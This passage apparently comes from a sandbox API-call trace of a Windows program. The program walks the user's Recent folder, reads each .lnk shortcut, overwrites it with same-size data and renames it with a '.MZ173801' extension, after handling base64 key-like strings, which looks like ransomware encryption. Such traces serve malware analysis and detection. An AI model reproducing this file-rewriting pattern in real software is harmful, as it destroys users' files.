lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.515] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.515] GetCurrentThreadId () returned 0x1358 [0109.515] GetCurrentThreadId () returned 0x1358 [0109.515] GetCurrentThreadId () returned 0x1358 [0109.515] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\K4Pe6YIq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\k4pe6yiq.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.515] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.516] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.516] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3b0 [0109.516] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.516] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3b0, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3b0, lpOverlapped=0x0) returned 1 [0109.516] CloseHandle (hObject=0x3f4) returned 1 [0109.526] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\K4Pe6YIq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\k4pe6yiq.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.528] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3b0, lpOverlapped=0x0) returned 1 [0109.549] CloseHandle (hObject=0x3f4) returned 1 [0109.553] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\K4Pe6YIq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\k4pe6yiq.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\K4Pe6YIq.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\k4pe6yiq.lnk.mz173801")) returned 1 [0109.553] GetCurrentThreadId () returned 0x1358 [0109.553] GetCurrentThreadId () returned 0x1358 [0109.553] GetCurrentThreadId () returned 0x1358 [0109.553] GetCurrentThreadId () returned 0x1358 [0109.553] GetCurrentThreadId () returned 0x1358 [0109.553] GetCurrentThreadId () returned 0x1358 [0109.553] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91e2f5a0, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x91e2f5a0, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x91e2f5a0, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="KL4cEqDQZvlWYISl9.lnk", cAlternateFileName="KL4CEQ~1.LNK")) returned 1 [0109.553] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.554] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.554] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KL4cEqDQZvlWYISl9.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\kl4ceqdqzvlwyisl9.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91e2f5a0, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x91e2f5a0, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x91e2f5a0, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x485)) returned 1 [0109.586] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.586] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.587] GetCurrentThreadId () returned 0x1358 [0109.587] GetCurrentThreadId () returned 0x1358 [0109.587] GetCurrentThreadId () returned 0x1358 [0109.587] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.587] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.587] GetCurrentThreadId () returned 0x1358 [0109.587] GetCurrentThreadId () returned 0x1358 [0109.587] GetCurrentThreadId () returned 0x1358 [0109.588] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KL4cEqDQZvlWYISl9.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\kl4ceqdqzvlwyisl9.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.588] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.588] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.588] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x485 [0109.588] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.588] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x485, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x485, lpOverlapped=0x0) returned 1 [0109.589] CloseHandle (hObject=0x3f4) returned 1 [0109.589] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KL4cEqDQZvlWYISl9.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\kl4ceqdqzvlwyisl9.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.590] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x485, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x485, lpOverlapped=0x0) returned 1 [0109.592] CloseHandle (hObject=0x3f4) returned 1 [0109.597] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KL4cEqDQZvlWYISl9.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\kl4ceqdqzvlwyisl9.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KL4cEqDQZvlWYISl9.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\kl4ceqdqzvlwyisl9.lnk.mz173801")) returned 1 [0109.597] GetCurrentThreadId () returned 0x1358 [0109.597] GetCurrentThreadId () returned 0x1358 [0109.597] GetCurrentThreadId () returned 0x1358 [0109.597] GetCurrentThreadId () returned 0x1358 [0109.597] GetCurrentThreadId () returned 0x1358 [0109.597] GetCurrentThreadId () returned 0x1358 [0109.597] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84154a54, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x84154a54, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x84154a54, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x54e, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ky0-S969NuCh.lnk", cAlternateFileName="KY0-S9~1.LNK")) returned 1 [0109.597] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.597] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.598] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ky0-S969NuCh.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ky0-s969nuch.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84154a54, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x84154a54, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x84154a54, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x54e)) returned 1 [0109.598] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.598] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 